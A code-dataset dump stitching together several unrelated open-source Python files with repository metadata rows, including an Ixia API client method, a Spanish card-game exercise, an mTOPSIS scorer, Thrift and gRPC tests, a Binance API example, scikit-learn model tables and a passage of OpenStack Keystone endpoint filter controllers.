- SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
stop(SessionIndices=string, async_operation=bool)
-------------------------------------------------
- SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('stop', payload=payload, response_object=None)
def get_device_ids(self, PortNames=None, Active=None, BridgePriority=None, SpSourceId=None, SystemId=None):
"""Base class infrastructure that gets a list of isisSpbSimRouter device ids encapsulated by this object.
Use the optional regex parameters in the method to refine the list of device ids encapsulated by this object.
Args
----
- PortNames (str): optional regex of port names
- Active (str): optional regex of active
- BridgePriority (str): optional regex of bridgePriority
- SpSourceId (str): optional regex of spSourceId
- SystemId (str): optional regex of systemId
Returns
-------
- list(int): A list of device ids that meets the regex criteria provided in the method parameters
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._get_ngpf_device_ids(locals())
| 46.904297 | 318 | 0.651968 |
daf1724ec3c56fe12e919c981a3459334cbebce4 | 1,568 | py | Python | LABORATORIO 7/ejercicio 8 lab 7.py | msolivera/Phyton | 1322fa2ff4bb06a17350fefa7e5268c0969e5b53 | [
"bzip2-1.0.6"
] | null | null | null | LABORATORIO 7/ejercicio 8 lab 7.py | msolivera/Phyton | 1322fa2ff4bb06a17350fefa7e5268c0969e5b53 | [
"bzip2-1.0.6"
] | null | null | null | LABORATORIO 7/ejercicio 8 lab 7.py | msolivera/Phyton | 1322fa2ff4bb06a17350fefa7e5268c0969e5b53 | [
"bzip2-1.0.6"
] | null | null | null | import random
class carta:
def __init__ (self, palo,valor):
self.palo=palo
self.valor=valor
def __repr__ (self):
return "Carta: "+str(self.valor)+ " de " + self.palo
#definimos la carta
#FALTA HACER QUE ELIMINE LAS CARTAS QUE VAN SALIENDO DEL MAZO
def def_mazo(): #genera un mazo de 40 cartas
mazo =[]
for i in range (12):
if i+1 != 8 and i+1 !=9:
mazo.append(carta("oro",i+1))
mazo.append(carta("copa",i+1))
mazo.append(carta("basto",i+1))
mazo.append(carta("espada",i+1))
return mazo
print(def_mazo())
def def_mano(mazo): #saca 3 cartas del mazo
mano=[]
for i in range (3):
mano.append(mazo[random.randint(0,len(mazo)-1)])
return mano
mazo=def_mazo()
mano=def_mano(mazo)
print (mano)
def muestra(mazo): #saca una muestra del mazo
return mazo[random.randint(0,len(def_mazo())-1)]
muestra_mano=muestra(mazo)
print(muestra_mano)
def flor_derecha(x): #define si las tres cartas que yo tengo con iguales
if x[0].palo == x[1].palo and x[0].palo==x[2].palo:
return True
else:
return False
print(flor_derecha(mano))
def pieza (mano,muestra):
if mano[0].palo == muestra.palo and mano[0].valor in (2,4,5,10,12):
return True
elif mano[1].palo==muestra.palo and mano[1].valor in (2,4,5,10,12):
return True
elif mano[2].palo==muestra.palo and mano[2].valor in (2,4,5,10,12):
return True
else:
return False
print(pieza(mano,muestra_mano))
| 20.102564 | 72 | 0.610332 |
3a9ca24e00eca92e48fd9d9d6c34e8e57760ad99 | 3,988 | py | Python | env/Lib/site-packages/mcdm/scoring/mtopsis.py | IzzatHalabi/newpix_prototype | 5d617ef20df59af57c26ca0f7fc8521afd4203f7 | [
"MIT"
] | null | null | null | env/Lib/site-packages/mcdm/scoring/mtopsis.py | IzzatHalabi/newpix_prototype | 5d617ef20df59af57c26ca0f7fc8521afd4203f7 | [
"MIT"
] | 4 | 2020-07-28T17:43:16.000Z | 2022-02-27T09:40:50.000Z | env/Lib/site-packages/mcdm/scoring/mtopsis.py | IzzatHalabi/newpix_prototype | 5d617ef20df59af57c26ca0f7fc8521afd4203f7 | [
"MIT"
] | null | null | null | # Copyright (c) 2020 Dimitrios-Georgios Akestoridis
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import numpy as np
def mtopsis(z_matrix, w_vector, is_benefit_z):
"""Python implementation of the mTOPSIS scoring method.
For more information, see the following publication:
* H. Deng, C.-H. Yeh, and R. J. Willis, "Inter-company comparison using
modified TOPSIS with objective weights," Computers & Operations
Research, vol. 27, no. 10, pp. 963--973, 2000.
DOI: 10.1016/S0305-0548(99)00069-6.
"""
# Make sure that the decision matrix is a float64 NumPy array
z_matrix = np.array(z_matrix, dtype=np.float64)
# Make sure that the weight vector is a float64 NumPy array
w_vector = np.array(w_vector, dtype=np.float64)
# Sanity checks
if (np.sum(np.less(z_matrix, 0.0)) > 0
or np.sum(np.greater(z_matrix, 1.0)) > 0):
raise ValueError("The decision matrix must be normalized "
"in order to apply the mTOPSIS scoring method")
elif w_vector.shape != (z_matrix.shape[1],):
raise ValueError("The shape of the weight vector is not "
"appropriate for the number of columns in the "
"decision matrix")
elif not np.isclose(np.sum(w_vector), 1.0):
raise ValueError("The weight vector's elements must sum to 1")
elif len(is_benefit_z) != z_matrix.shape[1]:
raise ValueError("The number of variables in the list that "
"determines whether each criterion is a benefit "
"or a cost criterion does not match the number "
"of columns in the decision matrix")
# mTOPSIS scores should always be sorted in descending order
desc_order = True
# Derive the positive and negative ideal solutions
pos_ideal_sol = np.zeros(z_matrix.shape[1], dtype=np.float64)
neg_ideal_sol = np.zeros(z_matrix.shape[1], dtype=np.float64)
for j in range(z_matrix.shape[1]):
if is_benefit_z[j]:
pos_ideal_sol[j] = np.amax(z_matrix[:, j])
neg_ideal_sol[j] = np.amin(z_matrix[:, j])
else:
pos_ideal_sol[j] = np.amin(z_matrix[:, j])
neg_ideal_sol[j] = np.amax(z_matrix[:, j])
# Compute the score of each alternative
s_vector = np.zeros(z_matrix.shape[0], dtype=np.float64)
for i in range(z_matrix.shape[0]):
pos_ideal_dist = 0.0
neg_ideal_dist = 0.0
for j in range(z_matrix.shape[1]):
pos_ideal_dist += (w_vector[j]
* (pos_ideal_sol[j] - z_matrix[i, j])**2)
neg_ideal_dist += (w_vector[j]
* (z_matrix[i, j] - neg_ideal_sol[j])**2)
pos_ideal_dist = np.sqrt(pos_ideal_dist)
neg_ideal_dist = np.sqrt(neg_ideal_dist)
s_vector[i] = neg_ideal_dist / (neg_ideal_dist + pos_ideal_dist)
return s_vector, desc_order
| 46.372093 | 77 | 0.660732 |
72864a966e4065c83e2afedd5bb2fded561104df | 4,395 | py | Python | thrift/test/py/UnionTests.py | dgrnbrg-meta/fbthrift | 1d5f0799ef53feeb83425b6c9c79f86aeac7d9ed | [
"Apache-2.0"
] | null | null | null | thrift/test/py/UnionTests.py | dgrnbrg-meta/fbthrift | 1d5f0799ef53feeb83425b6c9c79f86aeac7d9ed | [
"Apache-2.0"
] | null | null | null | thrift/test/py/UnionTests.py | dgrnbrg-meta/fbthrift | 1d5f0799ef53feeb83425b6c9c79f86aeac7d9ed | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# Copyright (c) Facebook, Inc. and its affiliates.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import json
import unittest
from thrift.protocol import TBinaryProtocol
from thrift.protocol import TSimpleJSONProtocol
from thrift.transport import TTransport
from thrift.test.UnionTest.ttypes import *
class TestUnionStructs(unittest.TestCase):
def test_init(self):
u = TestUnion()
self.assertEquals(TestUnion.__EMPTY__, u.getType())
v = TestUnion(string_field="test")
self.assertEquals(TestUnion.STRING_FIELD, v.getType())
self.assertEquals("test", v.value)
self.assertNotEqual(u, v)
try:
TestUnion(string_field="test", i32_field=100)
self.assertTrue(False, "Cannot initialize union with 1+ fields")
except Exception:
pass
def test_get_set(self):
u = TestUnion()
u.set_i32_field(10)
self.assertEquals(10, u.get_i32_field())
v = TestUnion(i32_field=10)
self.assertEquals(u, v)
self.assertRaises(AssertionError, u.get_other_i32_field)
def _test_json(self, j, v):
u = TestUnion()
u.readFromJson(json.dumps(j))
self.assertEquals(v, u)
def test_json(self):
v = TestUnion(i32_field=123)
j = {"i32_field": 123}
self._test_json(j, v)
v = TestUnion(string_field="test")
j = {"string_field": "test"}
self._test_json(j, v)
def test_repr(self):
"""Ensure that __repr__() return a valid expression that can be
used to construct the original object
"""
v = TestUnion(i32_field=123)
self.assertEquals(v, eval(v.__repr__()))
v = TestUnion()
self.assertEquals(v, eval(v.__repr__()))
v = TestUnion(string_field="test")
self.assertEquals(v, eval(v.__repr__()))
def _test_read_write(self, u, j):
protocol_factory = TBinaryProtocol.TBinaryProtocolAcceleratedFactory()
databuf = TTransport.TMemoryBuffer()
prot = protocol_factory.getProtocol(databuf)
u.write(prot)
ndatabuf = TTransport.TMemoryBuffer(databuf.getvalue())
prot = protocol_factory.getProtocol(ndatabuf)
v = u.__class__()
v.read(prot)
self.assertEquals(v, j)
def test_read_write(self):
l = [
(TestUnion(string_field="test"), TestUnion(string_field="test")),
(TestUnion(), TestUnion()),
(TestUnion(i32_field=100), TestUnion(i32_field=100)),
(
StructWithUnionAndOther(TestUnion(i32_field=100), "test"),
StructWithUnionAndOther(TestUnion(i32_field=100), "test"),
),
]
for i, j in l:
self._test_read_write(i, j)
def _test_json_output(self, u, j):
protocol_factory = TSimpleJSONProtocol.TSimpleJSONProtocolFactory()
databuf = TTransport.TMemoryBuffer()
prot = protocol_factory.getProtocol(databuf)
u.write(prot)
self.assertEquals(j, json.loads(databuf.getvalue().decode()))
def test_json_output(self):
l = [
(TestUnion(), {}),
(TestUnion(i32_field=10), {"i32_field": 10}),
(TestUnion(string_field="test"), {"string_field": "test"}),
(
StructWithUnionAndOther(TestUnion(i32_field=10), "test"),
{"test_union": {"i32_field": 10}, "string_field": "test"},
),
]
for i, j in l:
self._test_json_output(i, j)
def testIsUnion(self):
self.assertFalse(OneOfEach.isUnion())
self.assertTrue(TestUnion.isUnion())
if __name__ == "__main__":
unittest.main()
| 31.847826 | 78 | 0.638453 |
87d7c5c8ba99e34e0399392ef8c1aca3b5d09146 | 9,909 | py | Python | BPt/default/options/models.py | sahahn/ABCD_ML | a8b1c48c33f3fdc046c8922964f1c456273238da | [
"MIT"
] | 1 | 2019-09-25T23:23:49.000Z | 2019-09-25T23:23:49.000Z | BPt/default/options/models.py | sahahn/ABCD_ML | a8b1c48c33f3fdc046c8922964f1c456273238da | [
"MIT"
] | 1 | 2020-04-20T20:53:27.000Z | 2020-04-20T20:53:27.000Z | BPt/default/options/models.py | sahahn/ABCD_ML | a8b1c48c33f3fdc046c8922964f1c456273238da | [
"MIT"
] | 1 | 2019-06-21T14:44:40.000Z | 2019-06-21T14:44:40.000Z | from ...extensions.mlp import MLPRegressor_Wrapper, MLPClassifier_Wrapper
from sklearn.neighbors import KNeighborsClassifier, KNeighborsRegressor
from sklearn.tree import DecisionTreeClassifier, DecisionTreeRegressor
from sklearn.naive_bayes import GaussianNB
from sklearn.gaussian_process import (GaussianProcessClassifier,
GaussianProcessRegressor)
from sklearn.ensemble import (GradientBoostingClassifier,
GradientBoostingRegressor,
RandomForestRegressor, RandomForestClassifier,
ExtraTreesClassifier, ExtraTreesRegressor,
HistGradientBoostingRegressor,
HistGradientBoostingClassifier)
from sklearn.linear_model import (LogisticRegression, ElasticNet,
LinearRegression, HuberRegressor,
Lasso, Ridge, SGDClassifier,
SGDRegressor,
PassiveAggressiveClassifier,
BayesianRidge, ARDRegression,
TweedieRegressor)
from sklearn.svm import SVC, LinearSVR, SVR, LinearSVC
import warnings
from ..helpers import get_obj_and_params, all_from_avaliable
AVAILABLE = {
'binary': {
'logistic': 'logistic',
'linear': 'logistic',
'lasso': 'lasso logistic',
'ridge': 'ridge logistic',
'elastic': 'elastic net logistic',
'elastic net': 'elastic net logistic',
'gaussian nb': 'gaussian nb',
'knn': 'knn classifier',
'dt': 'dt classifier',
'rf': 'random forest classifier',
'random forest': 'random forest classifier',
'gp': 'gp classifier',
'svm': 'svm classifier',
'svc': 'svm classifier',
'linear svm': 'linear svm classifier',
'linear svc': 'linear svm classifier',
'mlp': 'mlp classifier',
'sgd': 'sgd classifier',
'gb': 'gb classifier',
'hgb': 'hgb classifier',
'et': 'et classifier',
'pa': 'pa classifier',
},
'regression': {
'linear': 'linear regressor',
'knn': 'knn regressor',
'dt': 'dt regressor',
'elastic': 'elastic net regressor',
'elastic net': 'elastic net regressor',
'rf': 'random forest regressor',
'random forest': 'random forest regressor',
'gp': 'gp regressor',
'svm': 'svm regressor',
'svr': 'svm regressor',
'linear svm': 'linear svm regressor',
'linear svr': 'linear svm regressor',
'mlp': 'mlp regressor',
'ridge': 'ridge regressor',
'lasso': 'lasso regressor',
'gb': 'gb regressor',
'hgb': 'hgb regressor',
'et': 'et regressor',
'bayesian ridge': 'bayesian ridge regressor',
'ard': 'ard regressor',
'tweedie': 'tweedie regressor',
},
}
# Should be the same
AVAILABLE['categorical'] = AVAILABLE['binary'].copy()
MODELS = {
'logistic': (LogisticRegression, ['base logistic']),
'lasso logistic': (LogisticRegression, ['base lasso', 'lasso C',
'lasso C extra']),
'ridge logistic': (LogisticRegression, ['base ridge', 'ridge C',
'ridge C extra']),
'elastic net logistic': (LogisticRegression, ['base elastic',
'elastic classifier',
'elastic clf v2',
'elastic classifier extra']),
'elastic net regressor': (ElasticNet, ['base elastic net',
'elastic regression',
'elastic regression extra']),
'ridge regressor': (Ridge, ['base ridge regressor',
'ridge regressor dist']),
'lasso regressor': (Lasso, ['base lasso regressor',
'lasso regressor dist']),
'huber': (HuberRegressor, ['base huber']),
'gaussian nb': (GaussianNB, ['base gnb']),
'knn classifier': (KNeighborsClassifier, ['base knn', 'knn dist']),
'knn regressor': (KNeighborsRegressor, ['base knn regression',
'knn dist regression']),
'dt classifier': (DecisionTreeClassifier, ['default',
'dt classifier dist']),
'dt regressor': (DecisionTreeRegressor, ['default', 'dt dist']),
'linear regressor': (LinearRegression, ['base linear']),
'random forest regressor': (RandomForestRegressor, ['base rf', 'rf dist']),
'random forest classifier': (RandomForestClassifier,
['base rf regressor', 'rf classifier dist']),
'gp regressor': (GaussianProcessRegressor, ['base gp regressor']),
'gp classifier': (GaussianProcessClassifier, ['base gp classifier']),
'svm regressor': (SVR, ['base svm', 'svm dist']),
'svm classifier': (SVC, ['base svm classifier', 'svm classifier dist']),
'mlp regressor': (MLPRegressor_Wrapper, ['default', 'mlp dist 3 layer',
'mlp dist es 3 layer',
'mlp dist 2 layer',
'mlp dist es 2 layer',
'mlp dist 1 layer',
'mlp dist es 1 layer']),
'mlp classifier': (MLPClassifier_Wrapper, ['default', 'mlp dist 3 layer',
'mlp dist es 3 layer',
'mlp dist 2 layer',
'mlp dist es 2 layer',
'mlp dist 1 layer',
'mlp dist es 1 layer']),
'linear svm classifier': (LinearSVC, ['base linear svc',
'linear svc dist']),
'linear svm regressor': (LinearSVR, ['base linear svr',
'linear svr dist']),
'sgd classifier': (SGDClassifier, ['default', 'sgd elastic classifier',
'sgd classifier big search']),
'sgd regressor': (SGDRegressor, ['default', 'sgd elastic']),
'gb classifier': (GradientBoostingClassifier, ['default']),
'gb regressor': (GradientBoostingRegressor, ['default']),
'hgb classifier': (HistGradientBoostingClassifier, ['default', 'hgb dist1']),
'hgb regressor': (HistGradientBoostingRegressor, ['default', 'hgb dist1']),
'et classifier': (ExtraTreesClassifier, ['default']),
'et regressor': (ExtraTreesRegressor, ['default']),
'pa classifier': (PassiveAggressiveClassifier, ['default']),
'bayesian ridge regressor': (BayesianRidge, ['default']),
'ard regressor': (ARDRegression, ['default']),
'tweedie regressor': (TweedieRegressor, ['default']),
}
try:
with warnings.catch_warnings():
warnings.simplefilter(action='ignore', category=FutureWarning)
from xgboost import XGBClassifier, XGBRegressor
AVAILABLE['binary']['xgb'] = 'xgb classifier'
AVAILABLE['regression']['xgb'] = 'xgb regressor'
AVAILABLE['categorical']['xgb'] = 'xgb classifier'
MODELS['xgb regressor'] = (XGBRegressor, ['base xgb', 'xgb dist1',
'xgb dist2', 'xgb dist3'])
MODELS['xgb classifier'] = (XGBClassifier, ['base xgb classifier',
'xgb classifier dist1',
'xgb classifier dist2',
'xgb classifier dist3'])
except ImportError:
pass
try:
from ...extensions.BPtLGBM import BPtLGBMRegressor, BPtLGBMClassifier
AVAILABLE['binary']['light gbm'] = 'light gbm classifier'
AVAILABLE['binary']['lgbm'] = 'light gbm classifier'
AVAILABLE['categorical']['light gbm'] = 'light gbm classifier'
AVAILABLE['categorical']['lgbm'] = 'light gbm classifier'
AVAILABLE['regression']['light gbm'] = 'light gbm regressor'
AVAILABLE['regression']['lgbm'] = 'light gbm regressor'
MODELS['light gbm regressor'] = (BPtLGBMRegressor, ['base lgbm',
'lgbm dist1',
'lgbm dist2',
'lgbm dist3'])
MODELS['light gbm classifier'] = (BPtLGBMClassifier,
['base lgbm',
'lgbm classifier dist1',
'lgbm classifier dist2',
'lgbm classifier dist3'])
except ImportError:
pass
def get_base_model_and_params(model_type, extra_params, model_type_params,
random_state=None, **kwargs):
model, extra_model_params, model_type_params =\
get_obj_and_params(model_type, MODELS, extra_params, model_type_params)
return model(**extra_model_params), model_type_params
all_obj_keys = all_from_avaliable(AVAILABLE)
| 45.040909 | 81 | 0.497729 |
d2fab4618e57e94265d61357e0e27bb8dd71bad1 | 459 | py | Python | example_d/market/get_liquidation_orders.py | BestResources/Binance_Futures_python | 3d08810d4b1cdb7f88d25fdf41a4207bfb8b6f94 | [
"MIT"
] | 640 | 2020-01-16T05:00:13.000Z | 2022-03-30T08:40:26.000Z | example_d/market/get_liquidation_orders.py | BestResources/Binance_Futures_python | 3d08810d4b1cdb7f88d25fdf41a4207bfb8b6f94 | [
"MIT"
] | 140 | 2020-01-19T20:27:35.000Z | 2022-03-28T08:28:43.000Z | example_d/market/get_liquidation_orders.py | BestResources/Binance_Futures_python | 3d08810d4b1cdb7f88d25fdf41a4207bfb8b6f94 | [
"MIT"
] | 391 | 2020-01-15T07:12:26.000Z | 2022-03-31T14:24:19.000Z | from binance_d import RequestClient
from binance_d.constant.test import *
from binance_d.base.printobject import *
request_client = RequestClient(api_key=g_api_key, secret_key=g_secret_key)
# result = request_client.get_liquidation_orders()
result = request_client.get_liquidation_orders(symbol="btcusd_200925")
print("======= Get all Liquidation Orders =======")
PrintMix.print_data(result)
print("==========================================")
| 35.307692 | 75 | 0.701525 |
a84b4a5c71500fb98e8c27668be3a1674d9f89b7 | 1,428 | py | Python | src/python/grpcio_tests/tests_aio/unit/init_test.py | gluk-w/grpc | 9fac907f806c3a9b9b775b15d8e3cb387c4d7048 | [
"Apache-2.0"
] | 1 | 2021-09-04T19:49:25.000Z | 2021-09-04T19:49:25.000Z | src/python/grpcio_tests/tests_aio/unit/init_test.py | gluk-w/grpc | 9fac907f806c3a9b9b775b15d8e3cb387c4d7048 | [
"Apache-2.0"
] | null | null | null | src/python/grpcio_tests/tests_aio/unit/init_test.py | gluk-w/grpc | 9fac907f806c3a9b9b775b15d8e3cb387c4d7048 | [
"Apache-2.0"
] | null | null | null | # Copyright 2019 The gRPC Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import unittest
from tests_aio.unit._test_base import AioTestBase
class TestInit(AioTestBase):
async def test_grpc(self):
import grpc # pylint: disable=wrong-import-position
channel = grpc.aio.insecure_channel('dummy')
self.assertIsInstance(channel, grpc.aio.Channel)
async def test_grpc_dot_aio(self):
import grpc.aio # pylint: disable=wrong-import-position
channel = grpc.aio.insecure_channel('dummy')
self.assertIsInstance(channel, grpc.aio.Channel)
async def test_aio_from_grpc(self):
from grpc import aio # pylint: disable=wrong-import-position
channel = aio.insecure_channel('dummy')
self.assertIsInstance(channel, aio.Channel)
if __name__ == '__main__':
logging.basicConfig(level=logging.DEBUG)
unittest.main(verbosity=2)
| 34.829268 | 74 | 0.734594 |
0365e6d6aba8e755fdbbf1f737a8a1a1e4f38092 | 1,539 | py | Python | Chapters/07.ShortestPathProblems/parcour_tools.py | ntienvu/SelectedTopicsOptimization | 069659ca9754cc7fd884b654a06157cc7da6f963 | [
"MIT"
] | 1 | 2021-01-01T13:01:38.000Z | 2021-01-01T13:01:38.000Z | Chapters/07.ShortestPathProblems/parcour_tools.py | ntienvu/SelectedTopicsOptimization | 069659ca9754cc7fd884b654a06157cc7da6f963 | [
"MIT"
] | null | null | null | Chapters/07.ShortestPathProblems/parcour_tools.py | ntienvu/SelectedTopicsOptimization | 069659ca9754cc7fd884b654a06157cc7da6f963 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Wed 6 Apr 2016
Last update on Thu 7 Apr 2016
@author: michielstock
Some routines to work with the parcours and mazes
for shortest path algorithms
"""
import numpy as np
from random import choice, randint
from shortestpaths import red
def links_to_graph(links):
"""
Changes links to undirected graph
"""
graph = {} # change in dictionary graph
for u, v in links: # make undirected graph
if u not in graph:
graph[u] = []
if v not in graph:
graph[v] = []
graph[u].append((1, v))
graph[v].append((1, u))
return graph
def plot_parcour(links, ax, line_width=5):
"""
Plots a maze or parcour on a given ax
"""
max_x = 0
max_y = 0
for (i1, j1), (i2, j2) in links:
ax.plot([i1, i2], [j1, j2], c='white', lw=line_width)
if max(i1, i2) > max_x:
max_x = max(i1, i2) + 0.5
if max(j1, j2) > max_y:
max_y = max(j1, j2) + 0.5
ax.set_xlim([-0.5, max_x])
ax.set_ylim([-0.5, max_y])
ax.set_axis_bgcolor('black')
def add_path(path, ax, color=red):
"""
Add a path to an ax
"""
for i in range(len(path)-1):
i1, j1 = path[i]
i2, j2 = path[i+1]
ax.plot([i1, i2], [j1, j2], c=color, lw=2)
def load_links(name):
file_handler = open(name, 'r')
links = set([])
for line in file_handler:
i1, j1, i2, j2 = map(int, line.rstrip().split(','))
links.add(((i1, j1), (i2, j2)))
return links
| 24.822581 | 61 | 0.554906 |
dcc39ebe01ee528abd60c4718d115ec197ae4830 | 1,549 | py | Python | test/testers/winforms/splitter_vertical/__init__.py | ABEMBARKA/monoUI | 5fda266ad2db8f89580a40b525973d86cd8de939 | [
"MIT"
] | 1 | 2019-08-13T15:22:12.000Z | 2019-08-13T15:22:12.000Z | test/testers/winforms/splitter_vertical/__init__.py | ABEMBARKA/monoUI | 5fda266ad2db8f89580a40b525973d86cd8de939 | [
"MIT"
] | null | null | null | test/testers/winforms/splitter_vertical/__init__.py | ABEMBARKA/monoUI | 5fda266ad2db8f89580a40b525973d86cd8de939 | [
"MIT"
] | 1 | 2019-08-13T15:22:17.000Z | 2019-08-13T15:22:17.000Z | ##############################################################################
# Written by: Brian G. Merrell <bgmerrell@novell.com>
# Date: 01/26/2009
# Application wrapper for splitter.py
# Used by the splitter-*.py tests
##############################################################################
'Application wrapper for splitter'
from strongwind import *
from os.path import exists
from sys import path
def launchSplitter(exe=None):
'Launch splitter with accessibility enabled and return a splitter object. Log an error and return None if something goes wrong'
if exe is None:
# make sure we can find the sample application
harness_dir = path[0]
i = harness_dir.rfind("/")
j = harness_dir[:i].rfind("/")
uiaqa_path = harness_dir[:j]
exe = '%s/samples/winforms/splitter_vertical.py' % uiaqa_path
if not exists(exe):
raise IOError, "Could not find file %s" % exe
args = [exe]
(app, subproc) = cache.launchApplication(args=args, name='ipy', wait=config.LONG_DELAY)
splitter = Splitter(app, subproc)
cache.addApplication(splitter)
splitter.splitterFrame.app = splitter
return splitter
# class to represent the application
class Splitter(accessibles.Application):
def __init__(self, accessible, subproc=None):
'Get a reference to the splitter window'
super(Splitter, self).__init__(accessible, subproc)
self.findFrame("Vertical Splitter", logName='Splitter')
| 31.612245 | 132 | 0.601033 |
4930903f737a09c0bcae95d6fef31c981b2905db | 12,150 | py | Python | keystone/contrib/endpoint_filter/controllers.py | TampereTC/tre-smartcity-keystone | e2d0adc25165eef102c87d7991fb1a595680fda6 | [
"Apache-2.0"
] | null | null | null | keystone/contrib/endpoint_filter/controllers.py | TampereTC/tre-smartcity-keystone | e2d0adc25165eef102c87d7991fb1a595680fda6 | [
"Apache-2.0"
] | null | null | null | keystone/contrib/endpoint_filter/controllers.py | TampereTC/tre-smartcity-keystone | e2d0adc25165eef102c87d7991fb1a595680fda6 | [
"Apache-2.0"
] | null | null | null | # Copyright 2013 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import six
from keystone import assignment
from keystone.catalog import controllers as catalog_controllers
from keystone.common import controller
from keystone.common import dependency
from keystone import exception
from keystone import notifications
@dependency.requires('assignment_api', 'catalog_api', 'endpoint_filter_api')
class _ControllerBase(controller.V3Controller):
"""Base behaviors for endpoint filter controllers."""
def _get_endpoint_groups_for_project(self, project_id):
# recover the project endpoint group memberships and for each
# membership recover the endpoint group
self.assignment_api.get_project(project_id)
try:
refs = self.endpoint_filter_api.list_endpoint_groups_for_project(
project_id)
endpoint_groups = [self.endpoint_filter_api.get_endpoint_group(
ref.endpoint_group_id) for ref in refs]
return endpoint_groups
except exception.EndpointGroupNotFound:
return []
def _get_endpoints_filtered_by_endpoint_group(self, endpoint_group_id):
endpoints = self.catalog_api.list_endpoints()
filters = self.endpoint_filter_api.get_endpoint_group(
endpoint_group_id)['filters']
filtered_endpoints = []
for endpoint in endpoints:
is_candidate = True
for key, value in six.iteritems(filters):
if endpoint[key] != value:
is_candidate = False
break
if is_candidate:
filtered_endpoints.append(endpoint)
return filtered_endpoints
class EndpointFilterV3Controller(_ControllerBase):
def __init__(self):
super(EndpointFilterV3Controller, self).__init__()
notifications.register_event_callback(
notifications.ACTIONS.deleted, 'project',
self._on_project_or_endpoint_delete)
notifications.register_event_callback(
notifications.ACTIONS.deleted, 'endpoint',
self._on_project_or_endpoint_delete)
def _on_project_or_endpoint_delete(self, service, resource_type, operation,
payload):
project_or_endpoint_id = payload['resource_info']
if resource_type == 'project':
self.endpoint_filter_api.delete_association_by_project(
project_or_endpoint_id)
else:
self.endpoint_filter_api.delete_association_by_endpoint(
project_or_endpoint_id)
@controller.protected()
def add_endpoint_to_project(self, context, project_id, endpoint_id):
"""Establishes an association between an endpoint and a project."""
# NOTE(gyee): we just need to make sure endpoint and project exist
# first. We don't really care whether if project is disabled.
# The relationship can still be established even with a disabled
# project as there are no security implications.
self.catalog_api.get_endpoint(endpoint_id)
self.assignment_api.get_project(project_id)
self.endpoint_filter_api.add_endpoint_to_project(endpoint_id,
project_id)
@controller.protected()
def check_endpoint_in_project(self, context, project_id, endpoint_id):
"""Verifies endpoint is currently associated with given project."""
self.catalog_api.get_endpoint(endpoint_id)
self.assignment_api.get_project(project_id)
self.endpoint_filter_api.check_endpoint_in_project(endpoint_id,
project_id)
@controller.protected()
def list_endpoints_for_project(self, context, project_id):
"""List all endpoints currently associated with a given project."""
self.assignment_api.get_project(project_id)
refs = self.endpoint_filter_api.list_filtered_endpoints_for_project(
project_id)
return catalog_controllers.EndpointV3.wrap_collection(
context, refs)
@controller.protected()
def remove_endpoint_from_project(self, context, project_id, endpoint_id):
"""Remove the endpoint from the association with given project."""
self.endpoint_filter_api.remove_endpoint_from_project(endpoint_id,
project_id)
@controller.protected()
def list_projects_for_endpoint(self, context, endpoint_id):
"""Return a list of projects associated with the endpoint."""
self.catalog_api.get_endpoint(endpoint_id)
refs = self.endpoint_filter_api.list_projects_for_endpoint(endpoint_id)
projects = [self.assignment_api.get_project(
ref.project_id) for ref in refs]
return assignment.controllers.ProjectV3.wrap_collection(context,
projects)
class EndpointGroupV3Controller(_ControllerBase):
collection_name = 'endpoint_groups'
member_name = 'endpoint_group'
VALID_FILTER_KEYS = ['service_id', 'region_id', 'interface']
def __init__(self):
super(EndpointGroupV3Controller, self).__init__()
@controller.protected()
def create_endpoint_group(self, context, endpoint_group):
"""Creates an Endpoint Group with the associated filters."""
